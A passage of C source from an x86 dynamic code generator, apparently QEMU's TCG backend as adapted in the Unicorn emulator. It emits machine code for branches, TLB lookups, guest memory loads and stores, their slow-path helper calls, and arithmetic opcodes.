           immediate load 10 + 6 = 16 bytes, plus we may
           be able to re-use the pool constant for more calls.  */
        tcg_out_opc(s, OPC_GRP5, 0, 0, 0);
        tcg_out8(s, (call ? EXT5_CALLN_Ev : EXT5_JMPN_Ev) << 3 | 5);
        new_pool_label(s, (uintptr_t)dest, R_386_PC32, s->code_ptr, -4);
        tcg_out32(s, 0);
    }
}

static inline void tcg_out_call(TCGContext *s, tcg_insn_unit *dest)
{
    tcg_out_branch(s, 1, dest);
}

static void tcg_out_jmp(TCGContext *s, tcg_insn_unit *dest)
{
    tcg_out_branch(s, 0, dest);
}

static void tcg_out_nopn(TCGContext *s, int n)
{
    int i;
    /* Emit 1 or 2 operand size prefixes for the standard one byte nop,
     * "xchg %eax,%eax", forming "xchg %ax,%ax". All cores accept the
     * duplicate prefix, and all of the interesting recent cores can
     * decode and discard the duplicates in a single cycle.
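     * For example, n == 3 emits the bytes 66 66 90.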
*/ tcg_debug_assert(n >= 1); for (i = 1; i < n; ++i) { tcg_out8(s, 0x66); } tcg_out8(s, 0x90); } #include "../tcg-ldst.inc.c" /* helper signature: helper_ret_ld_mmu(CPUState *env, target_ulong addr, * int mmu_idx, uintptr_t ra) */ static void * const qemu_ld_helpers[16] = { [MO_UB] = helper_ret_ldub_mmu, [MO_LEUW] = helper_le_lduw_mmu, [MO_LEUL] = helper_le_ldul_mmu, [MO_LEQ] = helper_le_ldq_mmu, [MO_BEUW] = helper_be_lduw_mmu, [MO_BEUL] = helper_be_ldul_mmu, [MO_BEQ] = helper_be_ldq_mmu, }; /* helper signature: helper_ret_st_mmu(CPUState *env, target_ulong addr, * uintxx_t val, int mmu_idx, uintptr_t ra) */ static void * const qemu_st_helpers[16] = { [MO_UB] = helper_ret_stb_mmu, [MO_LEUW] = helper_le_stw_mmu, [MO_LEUL] = helper_le_stl_mmu, [MO_LEQ] = helper_le_stq_mmu, [MO_BEUW] = helper_be_stw_mmu, [MO_BEUL] = helper_be_stl_mmu, [MO_BEQ] = helper_be_stq_mmu, }; /* Perform the TLB load and compare. Inputs: ADDRLO and ADDRHI contain the low and high part of the address. MEM_INDEX and S_BITS are the memory context and log2 size of the load. WHICH is the offset into the CPUTLBEntry structure of the slot to read. This should be offsetof addr_read or addr_write. Outputs: LABEL_PTRS is filled with 1 (32-bit addresses) or 2 (64-bit addresses) positions of the displacements of forward jumps to the TLB miss case. Second argument register is loaded with the low part of the address. In the TLB hit case, it has been adjusted as indicated by the TLB and so is a host address. In the TLB miss case, it continues to hold a guest address. First argument register is clobbered. */ static inline void tcg_out_tlb_load(TCGContext *s, TCGReg addrlo, TCGReg addrhi, int mem_index, MemOp opc, tcg_insn_unit **label_ptr, int which) { #ifdef TARGET_ARM struct uc_struct *uc = s->uc; #endif const TCGReg r0 = TCG_REG_L0; const TCGReg r1 = TCG_REG_L1; TCGType ttype = TCG_TYPE_I32; TCGType tlbtype = TCG_TYPE_I32; int trexw = 0, hrexw = 0, tlbrexw = 0; unsigned a_bits = get_alignment_bits(opc); unsigned s_bits = opc & MO_SIZE; unsigned a_mask = (1 << a_bits) - 1; unsigned s_mask = (1 << s_bits) - 1; target_ulong tlb_mask; if (TCG_TARGET_REG_BITS == 64) { if (TARGET_LONG_BITS == 64) { ttype = TCG_TYPE_I64; trexw = P_REXW; } if (TCG_TYPE_PTR == TCG_TYPE_I64) { hrexw = P_REXW; if (TARGET_PAGE_BITS + CPU_TLB_DYN_MAX_BITS > 32) { tlbtype = TCG_TYPE_I64; tlbrexw = P_REXW; } } } tcg_out_mov(s, tlbtype, r0, addrlo); tcg_out_shifti(s, SHIFT_SHR + tlbrexw, r0, TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); tcg_out_modrm_offset(s, OPC_AND_GvEv + trexw, r0, TCG_AREG0, TLB_MASK_TABLE_OFS(mem_index) + offsetof(CPUTLBDescFast, mask)); tcg_out_modrm_offset(s, OPC_ADD_GvEv + hrexw, r0, TCG_AREG0, TLB_MASK_TABLE_OFS(mem_index) + offsetof(CPUTLBDescFast, table)); /* If the required alignment is at least as large as the access, simply copy the address and mask. For lesser alignments, check that we don't cross pages for the complete access. */ if (a_bits >= s_bits) { tcg_out_mov(s, ttype, r1, addrlo); } else { tcg_out_modrm_offset(s, OPC_LEA + trexw, r1, addrlo, s_mask - a_mask); } tlb_mask = (target_ulong)TARGET_PAGE_MASK | a_mask; tgen_arithi(s, ARITH_AND + trexw, r1, tlb_mask, 0); /* cmp 0(r0), r1 */ tcg_out_modrm_offset(s, OPC_CMP_GvEv + trexw, r1, r0, which); /* Prepare for both the fast path add of the tlb addend, and the slow path function argument setup. 
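       r1 was page-masked for the comparison above, so it must be
       reloaded with the complete address before the addend is added.  */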
    tcg_out_mov(s, ttype, r1, addrlo);

    // Unicorn: take the fast path only if no memory hooks are enabled
    if (!HOOK_EXISTS(s->uc, UC_HOOK_MEM_READ) &&
        !HOOK_EXISTS(s->uc, UC_HOOK_MEM_WRITE)) {
        tcg_out_opc(s, OPC_JCC_long + JCC_JNE, 0, 0, 0);
    } else {
        /* slow_path, so data access will go via load_helper() */
        tcg_out_opc(s, OPC_JMP_long, 0, 0, 0);
    }
    label_ptr[0] = s->code_ptr;
    s->code_ptr += 4;

    if (TARGET_LONG_BITS > TCG_TARGET_REG_BITS) {
        /* cmp 4(r0), addrhi */
        tcg_out_modrm_offset(s, OPC_CMP_GvEv, addrhi, r0, which + 4);

        /* jne slow_path */
        tcg_out_opc(s, OPC_JCC_long + JCC_JNE, 0, 0, 0);
        label_ptr[1] = s->code_ptr;
        s->code_ptr += 4;
    }

    /* TLB Hit.  */

    /* add addend(r0), r1 */
    tcg_out_modrm_offset(s, OPC_ADD_GvEv + hrexw, r1, r0,
                         offsetof(CPUTLBEntry, addend));
}

/*
 * Record the context of a call to the out of line helper code for the slow path
 * for a load or store, so that we can later generate the correct helper code
 */
static void add_qemu_ldst_label(TCGContext *s, bool is_ld, bool is_64,
                                TCGMemOpIdx oi,
                                TCGReg datalo, TCGReg datahi,
                                TCGReg addrlo, TCGReg addrhi,
                                tcg_insn_unit *raddr,
                                tcg_insn_unit **label_ptr)
{
    TCGLabelQemuLdst *label = new_ldst_label(s);

    label->is_ld = is_ld;
    label->oi = oi;
    label->type = is_64 ? TCG_TYPE_I64 : TCG_TYPE_I32;
    label->datalo_reg = datalo;
    label->datahi_reg = datahi;
    label->addrlo_reg = addrlo;
    label->addrhi_reg = addrhi;
    label->raddr = raddr;
    label->label_ptr[0] = label_ptr[0];
    if (TARGET_LONG_BITS > TCG_TARGET_REG_BITS) {
        label->label_ptr[1] = label_ptr[1];
    }
}

/*
 * Generate code for the slow path for a load at the end of block
 */
static bool tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *l)
{
    TCGMemOpIdx oi = l->oi;
    MemOp opc = get_memop(oi);
    TCGReg data_reg;
    tcg_insn_unit **label_ptr = &l->label_ptr[0];
    int rexw = (l->type == TCG_TYPE_I64 ? P_REXW : 0);

    /* resolve label address */
    tcg_patch32(label_ptr[0], s->code_ptr - label_ptr[0] - 4);
    if (TARGET_LONG_BITS > TCG_TARGET_REG_BITS) {
        tcg_patch32(label_ptr[1], s->code_ptr - label_ptr[1] - 4);
    }

    if (TCG_TARGET_REG_BITS == 32) {
        int ofs = 0;

        tcg_out_st(s, TCG_TYPE_PTR, TCG_AREG0, TCG_REG_ESP, ofs);
        ofs += 4;

        tcg_out_st(s, TCG_TYPE_I32, l->addrlo_reg, TCG_REG_ESP, ofs);
        ofs += 4;

        if (TARGET_LONG_BITS == 64) {
            tcg_out_st(s, TCG_TYPE_I32, l->addrhi_reg, TCG_REG_ESP, ofs);
            ofs += 4;
        }

        tcg_out_sti(s, TCG_TYPE_I32, oi, TCG_REG_ESP, ofs);
        ofs += 4;

        tcg_out_sti(s, TCG_TYPE_PTR, (uintptr_t)l->raddr, TCG_REG_ESP, ofs);
    } else {
        tcg_out_mov(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[0], TCG_AREG0);
        /* The second argument is already loaded with addrlo.  */
        tcg_out_movi(s, TCG_TYPE_I32, tcg_target_call_iarg_regs[2], oi);
        tcg_out_movi(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[3],
                     (uintptr_t)l->raddr);
    }

    tcg_out_call(s, qemu_ld_helpers[opc & (MO_BSWAP | MO_SIZE)]);

    data_reg = l->datalo_reg;
    switch (opc & MO_SSIZE) {
    case MO_SB:
        tcg_out_ext8s(s, data_reg, TCG_REG_EAX, rexw);
        break;
    case MO_SW:
        tcg_out_ext16s(s, data_reg, TCG_REG_EAX, rexw);
        break;
#if TCG_TARGET_REG_BITS == 64
    case MO_SL:
        tcg_out_ext32s(s, data_reg, TCG_REG_EAX);
        break;
#endif
    case MO_UB:
    case MO_UW:
        /* Note that the helpers have zero-extended to tcg_target_long.
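           A plain 32-bit move therefore suffices for MO_UB, MO_UW
           and MO_UL alike.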
 */
    case MO_UL:
        tcg_out_mov(s, TCG_TYPE_I32, data_reg, TCG_REG_EAX);
        break;
    case MO_Q:
        if (TCG_TARGET_REG_BITS == 64) {
            tcg_out_mov(s, TCG_TYPE_I64, data_reg, TCG_REG_RAX);
        } else if (data_reg == TCG_REG_EDX) {
            /* xchg %edx, %eax */
            tcg_out_opc(s, OPC_XCHG_ax_r32 + TCG_REG_EDX, 0, 0, 0);
            tcg_out_mov(s, TCG_TYPE_I32, l->datahi_reg, TCG_REG_EAX);
        } else {
            tcg_out_mov(s, TCG_TYPE_I32, data_reg, TCG_REG_EAX);
            tcg_out_mov(s, TCG_TYPE_I32, l->datahi_reg, TCG_REG_EDX);
        }
        break;
    default:
        tcg_abort();
    }

    /* Jump to the code following the qemu_ld IR op.  */
    tcg_out_jmp(s, l->raddr);
    return true;
}

/*
 * Generate code for the slow path for a store at the end of block
 */
static bool tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *l)
{
    TCGMemOpIdx oi = l->oi;
    MemOp opc = get_memop(oi);
    MemOp s_bits = opc & MO_SIZE;
    tcg_insn_unit **label_ptr = &l->label_ptr[0];
    TCGReg retaddr;

    /* resolve label address */
    tcg_patch32(label_ptr[0], s->code_ptr - label_ptr[0] - 4);
    if (TARGET_LONG_BITS > TCG_TARGET_REG_BITS) {
        tcg_patch32(label_ptr[1], s->code_ptr - label_ptr[1] - 4);
    }

    if (TCG_TARGET_REG_BITS == 32) {
        int ofs = 0;

        tcg_out_st(s, TCG_TYPE_PTR, TCG_AREG0, TCG_REG_ESP, ofs);
        ofs += 4;

        tcg_out_st(s, TCG_TYPE_I32, l->addrlo_reg, TCG_REG_ESP, ofs);
        ofs += 4;

        if (TARGET_LONG_BITS == 64) {
            tcg_out_st(s, TCG_TYPE_I32, l->addrhi_reg, TCG_REG_ESP, ofs);
            ofs += 4;
        }

        tcg_out_st(s, TCG_TYPE_I32, l->datalo_reg, TCG_REG_ESP, ofs);
        ofs += 4;

        if (s_bits == MO_64) {
            tcg_out_st(s, TCG_TYPE_I32, l->datahi_reg, TCG_REG_ESP, ofs);
            ofs += 4;
        }

        tcg_out_sti(s, TCG_TYPE_I32, oi, TCG_REG_ESP, ofs);
        ofs += 4;

        retaddr = TCG_REG_EAX;
        tcg_out_movi(s, TCG_TYPE_PTR, retaddr, (uintptr_t)l->raddr);
        tcg_out_st(s, TCG_TYPE_PTR, retaddr, TCG_REG_ESP, ofs);
    } else {
        tcg_out_mov(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[0], TCG_AREG0);
        /* The second argument is already loaded with addrlo.  */
        tcg_out_mov(s, (s_bits == MO_64 ? TCG_TYPE_I64 : TCG_TYPE_I32),
                    tcg_target_call_iarg_regs[2], l->datalo_reg);
        tcg_out_movi(s, TCG_TYPE_I32, tcg_target_call_iarg_regs[3], oi);

        if (ARRAY_SIZE(tcg_target_call_iarg_regs) > 4) {
            retaddr = tcg_target_call_iarg_regs[4];
            tcg_out_movi(s, TCG_TYPE_PTR, retaddr, (uintptr_t)l->raddr);
        } else {
            retaddr = TCG_REG_RAX;
            tcg_out_movi(s, TCG_TYPE_PTR, retaddr, (uintptr_t)l->raddr);
            tcg_out_st(s, TCG_TYPE_PTR, retaddr, TCG_REG_ESP,
                       TCG_TARGET_CALL_STACK_OFFSET);
        }
    }

    /* "Tail call" to the helper, with the return address back inline.
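       Pushing l->raddr means the helper's own RET resumes execution
       immediately after the original memory access.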
*/ tcg_out_push(s, retaddr); tcg_out_jmp(s, qemu_st_helpers[opc & (MO_BSWAP | MO_SIZE)]); return true; } static void tcg_out_qemu_ld_direct(TCGContext *s, TCGReg datalo, TCGReg datahi, TCGReg base, int index, intptr_t ofs, int seg, bool is64, MemOp memop) { const MemOp real_bswap = memop & MO_BSWAP; MemOp bswap = real_bswap; int rexw = is64 * P_REXW; int movop = OPC_MOVL_GvEv; if (have_movbe && real_bswap) { bswap = 0; movop = OPC_MOVBE_GyMy; } switch (memop & MO_SSIZE) { case MO_UB: tcg_out_modrm_sib_offset(s, OPC_MOVZBL + seg, datalo, base, index, 0, ofs); break; case MO_SB: tcg_out_modrm_sib_offset(s, OPC_MOVSBL + rexw + seg, datalo, base, index, 0, ofs); break; case MO_UW: tcg_out_modrm_sib_offset(s, OPC_MOVZWL + seg, datalo, base, index, 0, ofs); if (real_bswap) { tcg_out_rolw_8(s, datalo); } break; case MO_SW: if (real_bswap) { if (have_movbe) { tcg_out_modrm_sib_offset(s, OPC_MOVBE_GyMy + P_DATA16 + seg, datalo, base, index, 0, ofs); } else { tcg_out_modrm_sib_offset(s, OPC_MOVZWL + seg, datalo, base, index, 0, ofs); tcg_out_rolw_8(s, datalo); } tcg_out_modrm(s, OPC_MOVSWL + rexw, datalo, datalo); } else { tcg_out_modrm_sib_offset(s, OPC_MOVSWL + rexw + seg, datalo, base, index, 0, ofs); } break; case MO_UL: tcg_out_modrm_sib_offset(s, movop + seg, datalo, base, index, 0, ofs); if (bswap) { tcg_out_bswap32(s, datalo); } break; #if TCG_TARGET_REG_BITS == 64 case MO_SL: if (real_bswap) { tcg_out_modrm_sib_offset(s, movop + seg, datalo, base, index, 0, ofs); if (bswap) { tcg_out_bswap32(s, datalo); } tcg_out_ext32s(s, datalo, datalo); } else { tcg_out_modrm_sib_offset(s, OPC_MOVSLQ + seg, datalo, base, index, 0, ofs); } break; #endif case MO_Q: if (TCG_TARGET_REG_BITS == 64) { tcg_out_modrm_sib_offset(s, movop + P_REXW + seg, datalo, base, index, 0, ofs); if (bswap) { tcg_out_bswap64(s, datalo); } } else { if (real_bswap) { int t = datalo; datalo = datahi; datahi = t; } if (base != datalo) { tcg_out_modrm_sib_offset(s, movop + seg, datalo, base, index, 0, ofs); tcg_out_modrm_sib_offset(s, movop + seg, datahi, base, index, 0, ofs + 4); } else { tcg_out_modrm_sib_offset(s, movop + seg, datahi, base, index, 0, ofs + 4); tcg_out_modrm_sib_offset(s, movop + seg, datalo, base, index, 0, ofs); } if (bswap) { tcg_out_bswap32(s, datalo); tcg_out_bswap32(s, datahi); } } break; default: tcg_abort(); } } /* XXX: qemu_ld and qemu_st could be modified to clobber only EDX and EAX. It will be useful once fixed registers globals are less common. */ static void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args, bool is64) { TCGReg datalo, datahi, addrlo; TCGReg addrhi QEMU_UNUSED_VAR; TCGMemOpIdx oi; MemOp opc; int mem_index; tcg_insn_unit *label_ptr[2]; datalo = *args++; datahi = (TCG_TARGET_REG_BITS == 32 && is64 ? *args++ : 0); addrlo = *args++; addrhi = (TARGET_LONG_BITS > TCG_TARGET_REG_BITS ? *args++ : 0); oi = *args++; opc = get_memop(oi); mem_index = get_mmuidx(oi); tcg_out_tlb_load(s, addrlo, addrhi, mem_index, opc, label_ptr, offsetof(CPUTLBEntry, addr_read)); /* TLB Hit. */ tcg_out_qemu_ld_direct(s, datalo, datahi, TCG_REG_L1, -1, 0, 0, is64, opc); /* Record the current context of a load into ldst label */ add_qemu_ldst_label(s, true, is64, oi, datalo, datahi, addrlo, addrhi, s->code_ptr, label_ptr); } static void tcg_out_qemu_st_direct(TCGContext *s, TCGReg datalo, TCGReg datahi, TCGReg base, int index, intptr_t ofs, int seg, MemOp memop) { /* ??? Ideally we wouldn't need a scratch register. 
For user-only, we could perform the bswap twice to restore the original value instead of moving to the scratch. But as it is, the L constraint means that TCG_REG_L0 is definitely free here. */ const TCGReg scratch = TCG_REG_L0; const MemOp real_bswap = memop & MO_BSWAP; MemOp bswap = real_bswap; int movop = OPC_MOVL_EvGv; if (have_movbe && real_bswap) { bswap = 0; movop = OPC_MOVBE_MyGy; } switch (memop & MO_SIZE) { case MO_8: /* In 32-bit mode, 8-bit stores can only happen from [abcd]x. Use the scratch register if necessary. */ if (TCG_TARGET_REG_BITS == 32 && datalo >= 4) { tcg_out_mov(s, TCG_TYPE_I32, scratch, datalo); datalo = scratch; } tcg_out_modrm_sib_offset(s, OPC_MOVB_EvGv + P_REXB_R + seg, datalo, base, index, 0, ofs); break; case MO_16: if (bswap) { tcg_out_mov(s, TCG_TYPE_I32, scratch, datalo); tcg_out_rolw_8(s, scratch); datalo = scratch; } tcg_out_modrm_sib_offset(s, movop + P_DATA16 + seg, datalo, base, index, 0, ofs); break; case MO_32: if (bswap) { tcg_out_mov(s, TCG_TYPE_I32, scratch, datalo); tcg_out_bswap32(s, scratch); datalo = scratch; } tcg_out_modrm_sib_offset(s, movop + seg, datalo, base, index, 0, ofs); break; case MO_64: if (TCG_TARGET_REG_BITS == 64) { if (bswap) { tcg_out_mov(s, TCG_TYPE_I64, scratch, datalo); tcg_out_bswap64(s, scratch); datalo = scratch; } tcg_out_modrm_sib_offset(s, movop + P_REXW + seg, datalo, base, index, 0, ofs); } else if (bswap) { tcg_out_mov(s, TCG_TYPE_I32, scratch, datahi); tcg_out_bswap32(s, scratch); tcg_out_modrm_sib_offset(s, OPC_MOVL_EvGv + seg, scratch, base, index, 0, ofs); tcg_out_mov(s, TCG_TYPE_I32, scratch, datalo); tcg_out_bswap32(s, scratch); tcg_out_modrm_sib_offset(s, OPC_MOVL_EvGv + seg, scratch, base, index, 0, ofs + 4); } else { if (real_bswap) { int t = datalo; datalo = datahi; datahi = t; } tcg_out_modrm_sib_offset(s, movop + seg, datalo, base, index, 0, ofs); tcg_out_modrm_sib_offset(s, movop + seg, datahi, base, index, 0, ofs + 4); } break; default: tcg_abort(); } } static void tcg_out_qemu_st(TCGContext *s, const TCGArg *args, bool is64) { TCGReg datalo, datahi, addrlo; TCGReg addrhi QEMU_UNUSED_VAR; TCGMemOpIdx oi; MemOp opc; int mem_index; tcg_insn_unit *label_ptr[2]; datalo = *args++; datahi = (TCG_TARGET_REG_BITS == 32 && is64 ? *args++ : 0); addrlo = *args++; addrhi = (TARGET_LONG_BITS > TCG_TARGET_REG_BITS ? *args++ : 0); oi = *args++; opc = get_memop(oi); mem_index = get_mmuidx(oi); tcg_out_tlb_load(s, addrlo, addrhi, mem_index, opc, label_ptr, offsetof(CPUTLBEntry, addr_write)); /* TLB Hit. */ tcg_out_qemu_st_direct(s, datalo, datahi, TCG_REG_L1, -1, 0, 0, opc); /* Record the current context of a store into ldst label */ add_qemu_ldst_label(s, false, is64, oi, datalo, datahi, addrlo, addrhi, s->code_ptr, label_ptr); } static inline void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args, const int *const_args) { TCGArg a0, a1, a2; int c, const_a2, vexop, rexw = 0; #if TCG_TARGET_REG_BITS == 64 # define OP_32_64(x) \ case glue(glue(INDEX_op_, x), _i64): \ rexw = P_REXW; /* FALLTHRU */ \ case glue(glue(INDEX_op_, x), _i32) #else # define OP_32_64(x) \ case glue(glue(INDEX_op_, x), _i32) #endif /* Hoist the loads of the most common arguments. */ a0 = args[0]; a1 = args[1]; a2 = args[2]; const_a2 = const_args[2]; switch (opc) { case INDEX_op_exit_tb: /* Reuse the zeroing that exists for goto_ptr. 
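       The code_gen_epilogue entry clears EAX, which is exactly the
       null return value that exit_tb(0) must produce.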
*/ if (a0 == 0) { tcg_out_jmp(s, s->code_gen_epilogue); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_EAX, a0); tcg_out_jmp(s, s->tb_ret_addr); } break; case INDEX_op_goto_tb: if (s->tb_jmp_insn_offset) { /* direct jump method */ int gap; /* jump displacement must be aligned for atomic patching; * see if we need to add extra nops before jump */ gap = tcg_pcrel_diff(s, (void *)(QEMU_ALIGN_PTR_UP(s->code_ptr + 1, 4))); if (gap != 1) { tcg_out_nopn(s, gap - 1); } tcg_out8(s, OPC_JMP_long); /* jmp im */ s->tb_jmp_insn_offset[a0] = tcg_current_code_size(s); tcg_out32(s, 0); } else { /* indirect jump method */ tcg_out_modrm_offset(s, OPC_GRP5, EXT5_JMPN_Ev, -1, (intptr_t)(s->tb_jmp_target_addr + a0)); } set_jmp_reset_offset(s, a0); break; case INDEX_op_goto_ptr: /* jmp to the given host address (could be epilogue) */ tcg_out_modrm(s, OPC_GRP5, EXT5_JMPN_Ev, a0); break; case INDEX_op_br: tcg_out_jxx(s, JCC_JMP, arg_label(a0), 0); break; OP_32_64(ld8u): /* Note that we can ignore REXW for the zero-extend to 64-bit. */ tcg_out_modrm_offset(s, OPC_MOVZBL, a0, a1, a2); break; OP_32_64(ld8s): tcg_out_modrm_offset(s, OPC_MOVSBL + rexw, a0, a1, a2); break; OP_32_64(ld16u): /* Note that we can ignore REXW for the zero-extend to 64-bit. */ tcg_out_modrm_offset(s, OPC_MOVZWL, a0, a1, a2); break; OP_32_64(ld16s): tcg_out_modrm_offset(s, OPC_MOVSWL + rexw, a0, a1, a2); break; #if TCG_TARGET_REG_BITS == 64 case INDEX_op_ld32u_i64: #endif case INDEX_op_ld_i32: tcg_out_ld(s, TCG_TYPE_I32, a0, a1, a2); break; OP_32_64(st8): if (const_args[0]) { tcg_out_modrm_offset(s, OPC_MOVB_EvIz, 0, a1, a2); tcg_out8(s, a0); } else { tcg_out_modrm_offset(s, OPC_MOVB_EvGv | P_REXB_R, a0, a1, a2); } break; OP_32_64(st16): if (const_args[0]) { tcg_out_modrm_offset(s, OPC_MOVL_EvIz | P_DATA16, 0, a1, a2); tcg_out16(s, a0); } else { tcg_out_modrm_offset(s, OPC_MOVL_EvGv | P_DATA16, a0, a1, a2); } break; #if TCG_TARGET_REG_BITS == 64 case INDEX_op_st32_i64: #endif case INDEX_op_st_i32: if (const_args[0]) { tcg_out_modrm_offset(s, OPC_MOVL_EvIz, 0, a1, a2); tcg_out32(s, a0); } else { tcg_out_st(s, TCG_TYPE_I32, a0, a1, a2); } break; OP_32_64(add): /* For 3-operand addition, use LEA. */ if (a0 != a1) { TCGArg c3 = 0; if (const_a2) { c3 = a2, a2 = -1; } else if (a0 == a2) { /* Watch out for dest = src + dest, since we've removed the matching constraint on the add. */ tgen_arithr(s, ARITH_ADD + rexw, a0, a1); break; } tcg_out_modrm_sib_offset(s, OPC_LEA + rexw, a0, a1, a2, 0, c3); break; } c = ARITH_ADD; goto gen_arith; OP_32_64(sub): c = ARITH_SUB; goto gen_arith; OP_32_64(and): c = ARITH_AND; goto gen_arith; OP_32_64(or): c = ARITH_OR; goto gen_arith; OP_32_64(xor): c = ARITH_XOR; goto gen_arith; gen_arith: if (const_a2) { tgen_arithi(s, c + rexw, a0, a2, 0); } else { tgen_arithr(s, c + rexw, a0, a2); } break; OP_32_64(andc): if (const_a2) { tcg_out_mov(s, rexw ? TCG_TYPE_I64 : TCG_TYPE_I32, a0, a1); tgen_arithi(s, ARITH_AND + rexw, a0, ~a2, 0); } else { tcg_out_vex_modrm(s, OPC_ANDN + rexw, a0, a2, a1); } break; OP_32_64(mul): if (const_a2) { int32_t val; val = a2; if (val == (int8_t)val) { tcg_out_modrm(s, OPC_IMUL_GvEvIb + rexw, a0, a0); tcg_out8(s, val); } else { tcg_out_modrm(s, OPC_IMUL_GvEvIz + rexw, a0, a0); tcg_out32(s, val); } } else { tcg_out_modrm(s, OPC_IMUL_GvEv + rexw, a0, a2); } break; OP_32_64(div2): tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_IDIV, args[4]); break; OP_32_64(divu2): tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_DIV, args[4]); break; OP_32_64(shl): /* For small constant 3-operand shift, use LEA. 
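       The SIB scale field holds the raw shift count, so counts of
       2 and 3 scale the index by 4 and 8 respectively.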
*/ if (const_a2 && a0 != a1 && (a2 - 1) < 3) { if (a2 - 1 == 0) { /* shl $1,a1,a0 -> lea (a1,a1),a0 */ tcg_out_modrm_sib_offset(s, OPC_LEA + rexw, a0, a1, a1, 0, 0); } else { /* shl $n,a1,a0 -> lea 0(,a1,n),a0 */ tcg_out_modrm_sib_offset(s, OPC_LEA + rexw, a0, -1, a1, a2, 0); } break; } c = SHIFT_SHL; vexop = OPC_SHLX; goto gen_shift_maybe_vex; OP_32_64(shr): c = SHIFT_SHR; vexop = OPC_SHRX; goto gen_shift_maybe_vex; OP_32_64(sar): c = SHIFT_SAR; vexop = OPC_SARX; goto gen_shift_maybe_vex; OP_32_64(rotl): c = SHIFT_ROL; goto gen_shift; OP_32_64(rotr): c = SHIFT_ROR; goto gen_shift; gen_shift_maybe_vex: if (have_bmi2) { if (!const_a2) { tcg_out_vex_modrm(s, vexop + rexw, a0, a2, a1); break; } tcg_out_mov(s, rexw ? TCG_TYPE_I64 : TCG_TYPE_I32, a0, a1); } /* FALLTHRU */ gen_shift: if (const_a2) { tcg_out_shifti(s, c + rexw, a0, a2); } else { tcg_out_modrm(s, OPC_SHIFT_cl + rexw, c, a0); } break; OP_32_64(ctz): tcg_out_ctz(s, rexw, args[0], args[1], args[2], const_args[2]); break; OP_32_64(clz): tcg_out_clz(s, rexw, args[0], args[1], args[2], const_args[2]); break; OP_32_64(ctpop): tcg_out_modrm(s, OPC_POPCNT + rexw, a0, a1); break; case INDEX_op_brcond_i32: tcg_out_brcond32(s, a2, a0, a1, const_args[1], arg_label(args[3]), 0); break; case INDEX_op_setcond_i32: tcg_out_setcond32(s, args[3], a0, a1, a2, const_a2); break; case INDEX_op_movcond_i32: tcg_out_movcond32(s, args[5], a0, a1, a2, const_a2, args[3]); break; OP_32_64(bswap16): tcg_out_rolw_8(s, a0); break; OP_32_64(bswap32): tcg_out_bswap32(s, a0); break; OP_32_64(neg): tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_NEG, a0); break; OP_32_64(not): tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_NOT, a0); break; OP_32_64(ext8s): tcg_out_ext8s(s, a0, a1, rexw); break; OP_32_64(ext16s): tcg_out_ext16s(s, a0, a1, rexw); break; OP_32_64(ext8u): tcg_out_ext8u(s, a0, a1); break; OP_32_64(ext16u): tcg_out_ext16u(s, a0, a1); break; case INDEX_op_qemu_ld_i32: tcg_out_qemu_ld(s, args, 0); break; case INDEX_op_qemu_ld_i64: tcg_out_qemu_ld(s, args, 1); break; case INDEX_op_qemu_st_i32: tcg_out_qemu_st(s, args, 0); break; case INDEX_op_qemu_st_i64: tcg_out_qemu_st(s, args, 1); break; OP_32_64(mulu2): tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_MUL, args[3]); break; OP_32_64(muls2): tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_IMUL, args[3]); break; OP_32_64(add2): if (const_args[4]) { tgen_arithi(s, ARITH_ADD + rexw, a0, args[4], 1); } else { tgen_arithr(s, ARITH_ADD + rexw, a0, args[4]); } if (const_args[5]) { tgen_arithi(s, ARITH_ADC + rexw, a1, args[5], 1); } else { tgen_arithr(s, ARITH_ADC + rexw, a1, args[5]); } break; OP_32_64(sub2): if (const_args[4]) { tgen_arithi(s, ARITH_SUB + rexw, a0, args[4], 1); } else { tgen_arithr(s, ARITH_SUB + rexw, a0, args[4]); } if (const_args[5]) { tgen_arithi(s, ARITH_SBB + rexw, a1, args[5], 1); } else { tgen_arithr(s, ARITH_SBB + rexw, a1, args[5]); } break; #if TCG_TARGET_REG_BITS == 32 case INDEX_op_brcond2_i32: tcg_out_brcond2(s, args, const_args, 0); break; case INDEX_op_setcond2_i32: tcg_out_setcond2(s, args, const_args); break; #else /* TCG_TARGET_REG_BITS == 64 */ case INDEX_op_ld32s_i64: tcg_out_modrm_offset(s, OPC_MOVSLQ, a0, a1, a2); break; case INDEX_op_ld_i64: tcg_out_ld(s, TCG_TYPE_I64, a0, a1, a2); break; case INDEX_op_st_i64: if (const_args[0]) { tcg_out_modrm_offset(s, OPC_MOVL_EvIz | P_REXW, 0, a1, a2); tcg_out32(s, a0); } else { tcg_out_st(s, TCG_TYPE_I64, a0, a1, a2); } break; case INDEX_op_brcond_i64: tcg_out_brcond64(s, a2, a0, a1, const_args[1], arg_label(args[3]), 0); break; case INDEX_op_setcond_i64: 
